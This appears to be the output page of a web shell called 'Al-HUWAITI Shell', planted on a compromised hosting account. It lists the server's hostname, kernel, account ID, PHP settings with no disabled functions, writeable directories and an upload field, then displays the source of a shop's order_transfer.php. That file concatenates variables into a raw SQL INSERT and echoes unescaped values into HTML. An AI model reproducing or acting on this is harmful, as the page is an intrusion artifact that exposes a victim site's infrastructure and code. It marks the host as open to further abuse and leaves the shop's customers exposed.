Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/bond-lounge.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/bond-lounge.com/public_html/order_transfer.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
 include("headerstrict.php"); ?>
<?php 
if (isset($_GET['order_id'])){
	$order_id = mysqli_real_escape_string($con,$_GET['order_id']);
	$stmt = $con -> prepare('SELECT * FROM my_orders WHERE order_id=?');
	$stmt -> bind_param('s',$order_id);
	$stmt -> execute(); 
	$stmt -> store_result(); 
	$stmt -> bind_result($id,$user_id_db,$order_id,$total,$nice_date,$horrible_date,$status,$email_succesful,$email_delivered,$delivery_zone_complete,$payment_method); 
	$numrows = $stmt -> num_rows();
	
	//status coloring
	if($numrows > 0){
		while ($stmt -> fetch()) { 
			$divided = explode('-',$delivery_zone_complete,2);
			$delivery_zone_id = $divided[0];
			$delivery_zone_fee = $divided[1];

			//get the zone locations
			$stmt_de = $con -> prepare('SELECT * FROM delivery_zones WHERE id = ?'); 
			$stmt_de -> bind_param('s',$delivery_zone_id);
			$stmt_de -> execute(); 
			$stmt_de -> store_result(); 
			$stmt_de -> bind_result($id_dz,$fee,$zone,$locations,$dis); 
			$numrows_de = $stmt_de -> num_rows();
			if($numrows_de > 0){
				while ($stmt_de -> fetch()) {}
			}
		if($status=="Pending"){$status_color="red";}
		if($status=="Completed"){$status_color="forestgreen";}
		}
	}
	else{echo "<meta http-equiv=\"refresh\" content=\"0; url=$link\">";exit();}
	
	//only owner can view
	if($user_id == $user_id_db){
	}
	else{echo "<meta http-equiv=\"refresh\" content=\"0; url=$link\">";exit();}
	
	//convert to kobo for paystack
	$gt = $total + $delivery_zone_fee;
	function to_kobo($value)
		{
			return intval(
				strval(floatval(
					preg_replace("/[^0-9.]/", "", $value)
				) * 100)
			);
		}
		
	$amount_in_kobo = to_kobo("$gt");
}
else{echo "<meta http-equiv=\"refresh\" content=\"0; url=$link\">";exit();}
?>
<?php 
if (isset($_POST['bank_transfer'])){
	//send  notification
	$content ="Your order $order_id has been successfully made";
	$sender ="System";
	$receiver = "$user_id";
	$seen ="No";
	$date_notification = date("D,dS M, Y g:ia");
	
	mysqli_query($con,"INSERT INTO notifications VALUES(
	'0',
	'$content',
	'$sender',
	'$receiver',
	'$seen',
	'$date_notification'
	)")or die(mysqli_error($con));
//create a session to verify it's coming from here
		$_SESSION["action"] = "true";
		$message="Your order has been successfully made. We will contact you shortly to confirm your order. Thanks for shopping at $company_name";
		echo "<meta http-equiv=\"refresh\" content=\"0; url=success?u=account&m=$message\">";
		exit();
	}
?>
<title><?php echo $company_name; ?> - Order no <?php echo $order_id; ?></title>
<?php 
$page_title = "Order $order_id";
$page_header = "shop_header.jpg";
include("page_header.php");
?>
<br><br>



<div class="checkout">
	<div class="container">
		<div class="row">
			<div class="col-lg-6">
<div class="billing"><br/><br/>
<div class="checkout_title">Order Details</div><br/>
<div class='row'>
<?php 
	$stmt1 = $con -> prepare('SELECT * FROM cart_details WHERE order_id=?');
	$stmt1 -> bind_param('s',$order_id);
	$stmt1 -> execute(); 
	$stmt1 -> store_result(); 
	$stmt1 -> bind_result($id,$order_id,$product_id,$product_title,$product_price,$product_image,$qty); 
	$numrows1 = $stmt1 -> num_rows();
	if($numrows1 > 0){
		while ($stmt1 -> fetch()) { 
		echo"
		<div class='col-6 col-sm-6 col-md-6 col-lg-6'>
		<div style='border:1px solid lightgrey;padding:12px;border-radius:5px;'>
		<a href='product_details?u=$product_id'>
		<img src='site_img/products/$product_image' alt='' style='width:100px;height:100px;border-radius:5px;'><br/>
		<b>$product_title</b></a><br/>$currency";
		echo number_format($product_price);
		echo
		"
		<br/>Qty - $qty<hr/>
		</div> <br><br>
		</div>";
		$total = $qty * $product_price;
		$total_array[] = $total;
		}
		echo"</div>";
		echo"Status <span class='number_box' style='color:$status_color;'>$status</span><br/>";
		$grand_total = array_sum($total_array);
		$gt = $grand_total + $delivery_zone_fee;
		echo"	
		<div class='lineo'></div>
		Subtotal<span class='number_box_order'>$currency";echo number_format($grand_total);echo"</span><br/>
		Shipping Fee<span class='number_box_order'>$currency";echo number_format($delivery_zone_fee);echo"</span>
		<div class='lineo'></div>
		Total <span class='number_box_order the_color'>$currency";echo number_format($gt);echo"
		</span>";
	}
	else{echo "<meta http-equiv=\"refresh\" content=\"0; url=$link\">";exit();}
?>

</div>
</div>

<div class="col-lg-6">
<div class="billing"><br/><br/>
<div class="checkout_title">Bank Transfer</div><br/>
<div style='font-size:22px;'> Kindly make a payment of <br> <?php echo $currency; echo number_format($gt); ?><br/>
to <b><?php echo"$bank_name - $bank_account"; ?></b> </div>
	<form method="POST" action="order_transfer<?php echo"?order_id=$order_id" ?>" class="php-email-form1">
		<br/><br/>
		<button type='submit' name='bank_transfer' class="btn btn-primary">I have done the transfer</button>
	</form>

</div>
</div>
</div>
		

	</div>
</div>
<br><br>
<?php include("footer.php"); ?>

Al-HUWAITI Shell